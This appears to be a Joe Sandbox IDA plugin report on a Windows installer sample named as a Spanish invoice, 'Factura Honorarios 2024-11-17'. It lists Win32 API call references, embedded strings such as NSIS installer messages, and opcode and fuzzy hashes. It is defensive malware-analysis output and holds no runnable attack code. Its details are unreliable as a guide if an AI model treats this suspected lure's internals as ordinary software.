                                                                                                                                    • Part of subcall function 00405D7A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                  • String ID: %ls=%ls$[Rename]
                                                                                                                                  • API String ID: 2171350718-461813615
                                                                                                                                  • Opcode ID: 6c09ebac5ca80c8a4b241fb83fb30afa3bc9886cecd9621b20837952e45bb45a
                                                                                                                                  • Instruction ID: cb5629e100ec4411e7767e9ff1715c79388972a83a2f5f57e92a2ee479f5e204
                                                                                                                                  • Opcode Fuzzy Hash: 6c09ebac5ca80c8a4b241fb83fb30afa3bc9886cecd9621b20837952e45bb45a
                                                                                                                                  • Instruction Fuzzy Hash: 92313571240B19BBD230AB659D48F6B3A5CEF45744F15003BF906F72D2EA7C98118ABD
                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402EEE
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                                                                                    • Part of subcall function 00405D7A: GetFileAttributesW.KERNEL32(00438800,00402F1D,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                                                                                    • Part of subcall function 00405D7A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                                                                                  Strings
                                                                                                                                  • soft, xrefs: 00402FCB
                                                                                                                                  • Error launching installer, xrefs: 00402F2D
                                                                                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
                                                                                                                                  • Inst, xrefs: 00402FC2
                                                                                                                                  • Null, xrefs: 00402FD4
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                  • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                  • API String ID: 4283519449-527102705
                                                                                                                                  • Opcode ID: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                                                                                                                  • Instruction ID: 8370a5f95b7ae461dcbe38738d17cc5e552d4c17a0c1bed0763bf9a4eadef116
                                                                                                                                  • Opcode Fuzzy Hash: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                                                                                                                  • Instruction Fuzzy Hash: FF51D171901204AFDB20AF65DD85B9E7FA8EB04319F14417BF904B72D5C7788E818BAD
                                                                                                                                  APIs
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(004281A0,00000400), ref: 004063E7
                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(004281A0,00000400,00000000,004226C8,?,00405323,004226C8,00000000), ref: 004063FA
                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00405323,?,00000000,004226C8,?,00405323,004226C8,00000000), ref: 00406436
                                                                                                                                  • SHGetPathFromIDListW.SHELL32(?,004281A0), ref: 00406444
                                                                                                                                  • CoTaskMemFree.OLE32(?), ref: 0040644F
                                                                                                                                  • lstrcatW.KERNEL32(004281A0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406475
                                                                                                                                  • lstrlenW.KERNEL32(004281A0,00000000,004226C8,?,00405323,004226C8,00000000), ref: 004064CD
                                                                                                                                  Strings
                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion, xrefs: 004063B7
                                                                                                                                  • \Microsoft\Internet Explorer\Quick Launch, xrefs: 0040646F
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                  APIs
                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0040427F
                                                                                                                                  • GetSysColor.USER32(00000000), ref: 004042BD
                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 004042C9
                                                                                                                                  • SetBkMode.GDI32(?,?), ref: 004042D5
                                                                                                                                  • GetSysColor.USER32(?), ref: 004042E8
                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 004042F8
                                                                                                                                  • DeleteObject.GDI32(?), ref: 00404312
                                                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 0040431C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                  • String ID:
                                                                                                                                  APIs
                                                                                                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                                    • Part of subcall function 00405E5B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E71
                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                  • String ID: 9
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(004226C8,00000000,?,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                                                                                  • lstrlenW.KERNEL32(0040324F,004226C8,00000000,?,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                                                                                  • lstrcatW.KERNEL32(004226C8,0040324F,0040324F,004226C8,00000000,?,004030B0), ref: 00405347
                                                                                                                                  • SetWindowTextW.USER32(004226C8,004226C8), ref: 00405359
                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                  • String ID:
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BD1
                                                                                                                                  • GetMessagePos.USER32 ref: 00404BD9
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00404BF3
                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C05
                                                                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C2B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                                                  • String ID: f
                                                                                                                                  APIs
                                                                                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                                                  • MulDiv.KERNEL32(?,00000064,?), ref: 00402E3C
                                                                                                                                  • wsprintfW.USER32 ref: 00402E4C
                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                                                                                  Strings
                                                                                                                                  • verifying installer: %d%%, xrefs: 00402E46
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                  • String ID: verifying installer: %d%%
                                                                                                                                  APIs
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
                                                                                                                                  • wsprintfW.USER32 ref: 00406640
                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                  • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                  APIs
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2667972263-0
                                                                                                                                  • Opcode ID: c69d54323394f40509acc41500ccf4ee793a6b17b65874263322f206e89ee029
                                                                                                                                  • Instruction ID: 08f8d52deffd015bf7aba9006bc7b8b19cff7c85b8e7ef16137ebd65050c2e74
                                                                                                                                  • Opcode Fuzzy Hash: c69d54323394f40509acc41500ccf4ee793a6b17b65874263322f206e89ee029
                                                                                                                                  • Instruction Fuzzy Hash: 1B218071C00528BBCF116FA5DE49D9E7E79EF08364F10023AF954762E1CB794D419B98
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$wsprintf
                                                                                                                                  • String ID: ... %d%%
                                                                                                                                  • API String ID: 551687249-2449383134
                                                                                                                                  • Opcode ID: 4944b1251af356e6bb346b061a98c6763ac612778cf045ef7954e78779300cc0
                                                                                                                                  • Instruction ID: eb9965c025c0ad248c1811abffb3300191da1be904cace2ded6344ef59bce26d
                                                                                                                                  • Opcode Fuzzy Hash: 4944b1251af356e6bb346b061a98c6763ac612778cf045ef7954e78779300cc0
                                                                                                                                  • Instruction Fuzzy Hash: 97516B71900219EBCB10DF65EA44A9F3BA8AF44766F1441BFFC04B72C1C7789E518BA9
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
                                                                                                                                  • wsprintfW.USER32 ref: 00404B52
                                                                                                                                  • SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                                                  • String ID: %u.%u%s%s$6B
                                                                                                                                  • API String ID: 3540041739-3884863406
                                                                                                                                  • Opcode ID: a815db82b42f543a9dd6a4ec2ba834401da5a56b00b51e1f2b8fc7ff7c1c6173
                                                                                                                                  • Instruction ID: 22ef8b20c3cb34d9681d0f1950c5ee3b7e818b69147609aa9b6e87f13a537159
                                                                                                                                  • Opcode Fuzzy Hash: a815db82b42f543a9dd6a4ec2ba834401da5a56b00b51e1f2b8fc7ff7c1c6173
                                                                                                                                  • Instruction Fuzzy Hash: 18110833A041283BDB10A96D9C46F9F329CDB85374F250237FA26F21D1DA79DC2182E8
                                                                                                                                  APIs
                                                                                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403334,00437800,75573420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
                                                                                                                                  • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
                                                                                                                                  • CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403334,00437800,75573420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
                                                                                                                                  • CharPrevW.USER32(?,?,00437800,00437800,00435000,00403334,00437800,75573420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Char$Next$Prev
                                                                                                                                  • String ID: *?|<>/":
                                                                                                                                  • API String ID: 589700163-165019052
                                                                                                                                  • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                  • Instruction ID: 9d8e3f8f3784457604ea521ff392e3c8e3efc90107dbe880bee10e7696629eb6
                                                                                                                                  • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                  • Instruction Fuzzy Hash: AB11B655800616A5DB303B18BC44A7762F8AF54B60F92403FED89736C5F77C5C9286BD
                                                                                                                                  APIs
                                                                                                                                  • lstrcatW.KERNEL32(00000000,00000000,0040A5A8,00436000,?,?,00000031), ref: 004017B0
                                                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,0040A5A8,0040A5A8,00000000,00000000,0040A5A8,00436000,?,?,00000031), ref: 004017D5
                                                                                                                                    • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                                                                                                    • Part of subcall function 004052EC: lstrlenW.KERNEL32(004226C8,00000000,?,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                                                                                    • Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,004226C8,00000000,?,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                                                                                    • Part of subcall function 004052EC: lstrcatW.KERNEL32(004226C8,0040324F,0040324F,004226C8,00000000,?,004030B0), ref: 00405347
                                                                                                                                    • Part of subcall function 004052EC: SetWindowTextW.USER32(004226C8,004226C8), ref: 00405359
                                                                                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1941528284-0
                                                                                                                                  • Opcode ID: 590c3d2934c31b3987365f8331b25d81c0607cb668f8e26b6ea01865aa0ee0af
                                                                                                                                  • Instruction ID: 128eea75dfaaf3eda36781b62dd3037428c7b97943fe82b2985fb16c69cf4114
                                                                                                                                  • Opcode Fuzzy Hash: 590c3d2934c31b3987365f8331b25d81c0607cb668f8e26b6ea01865aa0ee0af
                                                                                                                                  • Instruction Fuzzy Hash: C541A031900519BFCF10BBA5CD46EAE3679EF45328B20427FF412B10E1CA3C8A519A6E
                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(?), ref: 00401DBC
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                                  • CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3808545654-0
                                                                                                                                  • Opcode ID: 2e8c6812557a8000d290618689d5c167272f7de43d41522ca2a47e16c60e8740
                                                                                                                                  • Instruction ID: af8ff02f4bd052a881cb17574bfe8b5bbda2d2cac472569fbfdf17f98f113d3f
                                                                                                                                  • Opcode Fuzzy Hash: 2e8c6812557a8000d290618689d5c167272f7de43d41522ca2a47e16c60e8740
                                                                                                                                  • Instruction Fuzzy Hash: 39017571948240EFE7406BB4AF8ABD97FB49F95301F10457EE241B71E2CA7804459F2D
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1849352358-0
                                                                                                                                  • Opcode ID: 46abf127b461966594539b2cb00e82417843b13178a7bdfc66a6853df7de0eec
                                                                                                                                  • Instruction ID: 40ca5798c6d3b59526a1ee34621216737133408fbccdd52925800404f238639f
                                                                                                                                  • Opcode Fuzzy Hash: 46abf127b461966594539b2cb00e82417843b13178a7bdfc66a6853df7de0eec
                                                                                                                                  • Instruction Fuzzy Hash: A3F0EC72A04518AFDB01DBE4DE88CEEB7BCEB48301B14047AF641F61A0CA749D519B78
                                                                                                                                  APIs
                                                                                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                                  • String ID: !
                                                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                                                  • Opcode ID: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
                                                                                                                                  • Instruction ID: 994eb4c646dc30d4db2129160ed463076ae6c8af372a05c6722ea4476ca57ad0
                                                                                                                                  • Opcode Fuzzy Hash: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
                                                                                                                                  • Instruction Fuzzy Hash: 8E21C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605B61D0D7B889409B28
                                                                                                                                  APIs
                                                                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$Enum
                                                                                                                                  • String ID:
                                                                                                                                  APIs
                                                                                                                                  • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 004057FE
                                                                                                                                  • GetLastError.KERNEL32 ref: 00405812
                                                                                                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405827
                                                                                                                                  • GetLastError.KERNEL32 ref: 00405831
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                  • String ID:
                                                                                                                                  APIs
                                                                                                                                  • DestroyWindow.USER32(?,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402EAA
                                                                                                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                                                                                  • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                  • String ID:
                                                                                                                                  APIs
                                                                                                                                  • IsWindowVisible.USER32(?), ref: 0040528F
                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004052E0
                                                                                                                                    • Part of subcall function 00404247: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                                                  • String ID:
                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00405DC7
                                                                                                                                  • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,00403357,00437000,00437800,00437800,00437800,00437800,00437800,75573420,004035A3), ref: 00405DE2
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountFileNameTempTick
                                                                                                                                  • String ID: nsa
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 00405896
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004058A3
                                                                                                                                  Strings
                                                                                                                                  • Error launching installer, xrefs: 00405880
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                                                  • String ID: Error launching installer
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
                                                                                                                                  • Instruction ID: 21cf7db9f51931c48f99e7e9547f5b24ff728e46d141457ef608e09f17fb8729
                                                                                                                                  • Opcode Fuzzy Hash: d01b1c5effafd64d8cfad2db312f22eb5162b5418c1bb992621b7de497566ec4
                                                                                                                                  • Instruction Fuzzy Hash: 4C815571D04229DBDB24CFA9D8447ADBBB0FB44301F2081AEE456BB281C7786A86DF55
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
                                                                                                                                  • Instruction ID: dacb8e277fcbb3a33cac5efaa2c5173e23fd2fcd6bf81bdfe6f06a7534410a90
                                                                                                                                  • Opcode Fuzzy Hash: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
                                                                                                                                  • Instruction Fuzzy Hash: 6C714371E04229CBDF24CF98C8447ADBBB1FF44305F14806AD446BB281C738AA86DF04
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
                                                                                                                                  • Instruction ID: 610106becc8cf73b6091924598cab7a4a25495cbbf2bb893dbe28c15679d0a85
                                                                                                                                  • Opcode Fuzzy Hash: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
                                                                                                                                  • Instruction Fuzzy Hash: 5C714271E04229CBDB28CF98C844BADBBB1FF44301F14816AD456BB291C738A986DF45
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
                                                                                                                                  • Instruction ID: 65b73de0ce6de3c7b1653dbcc26eb67f08ce95b734c4b9eb4028e98c7b5a0113
                                                                                                                                  • Opcode Fuzzy Hash: 11d0e2bf2ab0c12615b3c88e0718215a3c217c66979ab711a777e3af05fd446c
                                                                                                                                  • Instruction Fuzzy Hash: 0B714371E04229DBEF28CF98C8447ADBBB1FF44305F11806AD456BB291C738AA96DF45
                                                                                                                                  APIs
                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                                                                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D07
                                                                                                                                  • CharNextA.USER32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D18
                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 190613189-0